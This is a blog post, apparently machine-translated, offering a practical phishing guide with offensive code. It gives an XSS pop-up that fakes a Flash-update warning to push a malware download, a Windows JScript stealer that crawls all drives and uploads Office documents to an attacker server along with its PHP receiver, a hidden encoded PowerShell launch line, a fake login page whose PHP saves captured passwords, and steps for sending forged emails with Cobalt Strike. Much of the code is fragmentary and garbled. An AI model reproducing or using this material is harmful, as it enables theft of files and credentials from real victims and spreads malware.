Phishing practice 2 -- combined email web page

Posted by anups on Tue, 22 Feb 2022 12:15:43 +0100

Add the previous article, a word binding idea

Combine front-end pages for fishing

Flash fishing

xss_ Flash fishing full set of source code
Self flash fishing another set of source code
1.1 combined flash fishing pop-up version
The source code from tools
I feel that the masters are very strong

Direct download pop-up
Throw the js file of the source code into the xss platform
Then pop up the window directly
Insert picture description here

1.2 page Jump ideas pop-up Download
The idea is to forge a flash home page
Then jump to the flash page to download without killing horses

Jump code
Define in xss platform module

window.alert = function(name){var iframe = document.createElement("IFRAME");"none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("Yours FLASH The version is too low. Please try to visit this page after upgrading!");window.location.href="Phishing page";

Custom code configuration

Then pop up in xss
Click to complete a complete fishing operation

JS file fishing

Reverse tracking of IP location in Js mode and investigation and evidence collection of true identity of traceable visitors

JS thief

Service receiver

	$fileName = uniqid(rand()) . '_' . iconv('utf-8', 'gbk', $_SERVER['HTTP_FILENAME']);
	print_r(file_put_contents("uploads/{$fileName}", $HTTP_RAW_POST_DATA));

Client browser content end

var __POSTURL__ = 'http://User's server / server php';

function UpFile(FilePath, FileName) {
	var Stream = new ActiveXObject('ADODB.Stream');
	Stream.Type = 1;
	var XHR = new ActiveXObject('Msxml2.XMLHTTP' || 'Microsoft.XMLHTTP');'POST', __POSTURL__, false);
	XHR.setRequestHeader('fileName', FileName);
	XHR.setRequestHeader('enctype', 'multipart/form-data');
	return XHR.responseText
function GetDriveList() {
	var fso = new ActiveXObject("Scripting.FileSystemObject");
	var e = new Enumerator(fso.Drives);
	var re = [];
	for (; ! e.atEnd(); e.moveNext()) {
		if (e.item().IsReady) {
	return re
function GetFolderList(folderspec) {
	var fso = new ActiveXObject("Scripting.FileSystemObject");
	var f = fso.GetFolder(folderspec);
	var fc = new Enumerator(f.SubFolders);
	var re = [];
	for (; ! fc.atEnd(); fc.moveNext()) {
	return re
function GetFileList(folderspec) {
	var fso = new ActiveXObject("Scripting.FileSystemObject");
	var f = fso.GetFolder(folderspec);
	var fc = new Enumerator(f.files);
	var re = [];
	for (; ! fc.atEnd(); fc.moveNext()) {
		re.push([fc.item(), fc.item().Name])
	return re
function Search(Drive) {
	var FolderList = GetFolderList(Drive);
	for (var i = 0; i < FolderList.length; i++) {
	var FileList = GetFileList(Drive);
	for (var i = 0; i < FileList.length; i++) {
		if (/\.(doc|docx|xls|xlsx)$/i.test(FileList[i])) {
			UpFile(FileList[i][0], FileList[i][1])
function Load() {
	var WMIs = GetObject("winmgmts:\\\\.\\root\\cimv2");
	var Items = WMIs.ExecQuery("SELECT * FROM Win32_Process WHERE Name = 'wscript.exe'");
	var i = 0,
	rs = new Enumerator(Items);
	for (; ! rs.atEnd(); rs.moveNext()) {
	if (i > 1) WScript.Quit(0);
	Items = WMIs = i = rs = null;
	var DriveList = GetDriveList();
	for (var i = 0; i < DriveList.length; i++) {
		Search(DriveList[i] + ":\\\\")

Typically, it can be used when calling ie's own browser
For example, the pop-up advertisement opened in wirar file is
If you get a dns server, change the host resolution, that is, winrar's website resolution, into your own server controllable, and then call ie's own browser to reverse the launch


require('child_process').exec('powershell -nop -w hidden -encodedcommand JABXXXXXXXX......');


header("X-Powered-By: PHP/<img	src=1	οnerrοr=import(unescape('http%3A//'))>");
<title>SEC TEST</title>

Common front-end page phishing

The front-end page can forge a phishing page in combination with the pickpocketing website, and then use the xss jump code to attack
Just forge a low-level sandbox
Common tools for hacking websites
Plug in for Save All Resources chrome
Teleport Ultra

  <form action="login.php" method="post"> 
    <legend>User login</legend> 
     <li> <label>user name:</label> <input type="text" name="username" /> </li> 
     <li> <label>password:</label> <input type="password" name="password" /> </li> 
     <li> <label> </label> <input type="submit" name="login" value="Sign in" /> </li> 

login. Page of PHP file

//Simple processing 
 header('Content-type:text/html; charset=utf-8');   // Process user login information  
if (isset($_POST['login'])) {    
   $username = trim($_POST['username']);  
   $password = trim($_POST['password']); 
   if (($username != '') || ($password != '')) 
$myfile = fopen("newfile.txt","w");
            $txt = $username."    ".$password;

#Other common logical code types

//Get the current script URL 
function GetCurUrl() 
$scriptName = $_SERVER["REQUEST_URI"]; 
$nowurl = $scriptName; 
$nowurl=str_replace("/","",$nowurl);//One is string matching One is regular matching, and the contents of the two are different.

return $nowurl; 

$url = $_SERVER["HTTP_REFERER"]; //Get the complete origin URL   
$str = str_replace("http://"," ", $url); / / remove http:// 
'<li><a href="social" class=now>whole</a></li>
 <li><a href="social?dq=zh">Head office</a></li>'.$str1.'';
echo $social;
'Replaced content'.$str1.'';
    echo $campus;   

'Saved content after replacement'.$str1.'';
    echo $intern;   


Fishing posture of special browser vulnerability class

Some gestures of Jenkins in fishing back door

Combine mailboxes for fishing

Take cs as an example

If it's Netease email, SMTP Host:Need to fill in
 If it is QQ Mailbox, SMTP Host:fill in
 All ports are 25

Preparation conditions
① Get a template
1. Click any email on qq

2. Click new window to open
Select to display the original message to save or export the eml file directly

② Enter relevant contents

After entering the content, click preview to preview
Send is to send relevant content directly

Often combine page forgery to go fishing

Topics: Javascript Front-end security